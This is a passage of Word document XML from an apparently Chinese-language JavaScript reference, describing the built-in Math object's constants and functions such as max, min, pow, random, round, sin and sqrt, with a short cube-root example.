      </w:r>
      <w:r>
        <w:t>的值，即常数</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>以</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>为底的对数。它的近似值为</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.442 695 040 888 963 387</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="696" w:name="Math_max__"/>
      <w:r>
        <w:t>Math.max()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="696"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回最大的参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.max(args...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>args...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>个或多个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数中最大的值。如果没有参数则返回</w:t>
      </w:r>
      <w:r>
        <w:t>-Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>。如果任意一个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>或不可转换为数字，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="697" w:name="Math_min__"/>
      <w:r>
        <w:t>Math.min()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="697"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回最小的参数</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Math.min(args...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>args...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>任意数量的参数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>给定参数中最小的值。如果没有参数则返回</w:t>
      </w:r>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>。如果任意一个参数是</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>或不可转换为数字，则返回</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="698" w:name="Math_PI"/>
      <w:r>
        <w:t>Math.PI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="698"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数学常量</w:t>
      </w:r>
      <w:r>
        <w:t>π</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.PI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.PI</w:t>
      </w:r>
      <w:r>
        <w:t>是常量</w:t>
      </w:r>
      <w:r>
        <w:t>π</w:t>
      </w:r>
      <w:r>
        <w:t>，圆周长与直径的比。它的近似值为</w:t>
      </w:r>
      <w:r>
        <w:t>3.141 592 653 589 79</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="699" w:name="Math_pow__"/>
      <w:r>
        <w:t>Math.pow()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="699"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>计算</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5Text"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.pow(x,y)</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乘方的底数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>y</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>乘方的指数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>次方，</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5Text"/>
        </w:rPr>
        <w:t>y</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Math.pow()</w:t>
      </w:r>
      <w:r>
        <w:t>计算</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>次方。可以向</w:t>
      </w:r>
      <w:r>
        <w:t>Math.pow()</w:t>
      </w:r>
      <w:r>
        <w:t>传递任何值。不过，如果结果为虚数或复数，则</w:t>
      </w:r>
      <w:r>
        <w:t>Math.pow()</w:t>
      </w:r>
      <w:r>
        <w:t>将返回</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>。实践中，这意味着如果</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>是负数，则</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>应该是正的或负的整数。同样，也不要忘记过大的指数很容易导致浮点溢出并返回一个</w:t>
      </w:r>
      <w:r>
        <w:t>Infinity</w:t>
      </w:r>
      <w:r>
        <w:t>值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="700" w:name="Math_random__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Math.random()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="700"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回一个伪随机数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.random()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个大于等于</w:t>
      </w:r>
      <w:r>
        <w:t>0.</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>并小于</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>的伪随机数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="701" w:name="Math_round__"/>
      <w:r>
        <w:t>Math.round()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="701"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>四舍五入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.round(x)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任意数字。</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最接近</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的整数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.round()</w:t>
      </w:r>
      <w:r>
        <w:t>将它的参数向上或向下取整到最接近的整数。它将</w:t>
      </w:r>
      <w:r>
        <w:t>0.5</w:t>
      </w:r>
      <w:r>
        <w:t>向上取整。例如，它将</w:t>
      </w:r>
      <w:r>
        <w:t>2.5</w:t>
      </w:r>
      <w:r>
        <w:t>取整为</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>，将</w:t>
      </w:r>
      <w:r>
        <w:t>-2.5</w:t>
      </w:r>
      <w:r>
        <w:t>取整为</w:t>
      </w:r>
      <w:r>
        <w:t>-2</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="702" w:name="Math_sin__"/>
      <w:r>
        <w:t>Math.sin()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="702"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>计算正弦值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.sin(x)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一个角度，单位为弧度制。可以通过乘以</w:t>
      </w:r>
      <w:r>
        <w:t>0.017 453 293(2π/360)</w:t>
      </w:r>
      <w:r>
        <w:t>的方式，将角度转换为弧度。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的正弦值。返回值将介于</w:t>
      </w:r>
      <w:r>
        <w:t>-1.0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
      <w:r>
        <w:t>之间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="703" w:name="Math_sqrt__"/>
      <w:r>
        <w:t>Math.sqrt()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="703"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>计算平方根</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.sqrt(x)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一个大于等于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的数值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的平方根。如果</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>小于</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>则返回</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</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Math.sqrt()</w:t>
      </w:r>
      <w:r>
        <w:t>计算给定数字的平方根。注意，然而，也可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>Math.pow()</w:t>
      </w:r>
      <w:r>
        <w:t>来计算某个数字的任意根。比如：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.cuberoot=function(x){return Math.pow(x,1/3);}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Math.cuberoot(8);//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="704" w:name="Math_SQRT1_2"/>
      <w:r>
        <w:t>Math.SQRT1_2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="704"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>数学常量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="263105" cy="142335"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="87" name="00087.jpeg" descr="figure_0801_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7.jpeg" descr="figure_0801_0088"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId90"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="263105" cy="142335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.SQRT1_2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.SQRT1_2</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="207033" cy="146649"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="88" name="00088.jpeg" descr="figure_0801_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8.jpeg" descr="figure_0801_0089"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId91"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="207033" cy="146649"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t>的值，</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>的平方根的倒数。这个常数的近似值为</w:t>
      </w:r>
      <w:r>
        <w:t>0.707 106 781 186 547 6</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="705" w:name="Math_SQRT2"/>
      <w:r>
        <w:t>Math.SQRT2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="705"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>数学常量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="163901" cy="129396"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="89" name="00089.jpeg" descr="figure_0801_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89.jpeg" descr="figure_0801_0090"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId92"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="163901" cy="129396"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Math.SQRT2</w:t>
      </w:r>
    </w:p>
